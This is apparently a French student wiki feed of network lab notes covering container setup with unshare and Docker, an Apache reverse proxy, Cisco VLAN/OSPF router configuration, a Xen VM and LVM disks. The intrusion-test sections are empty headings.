&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Ping_v6_google.png&amp;diff=49103</id>
		<title>Fichier:Ping v6 google.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Ping_v6_google.png&amp;diff=49103"/>
				<updated>2018-12-21T15:33:59Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49102</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49102"/>
				<updated>2018-12-21T15:31:21Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* 3.6 Interconnexion avec Internet IPv6 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
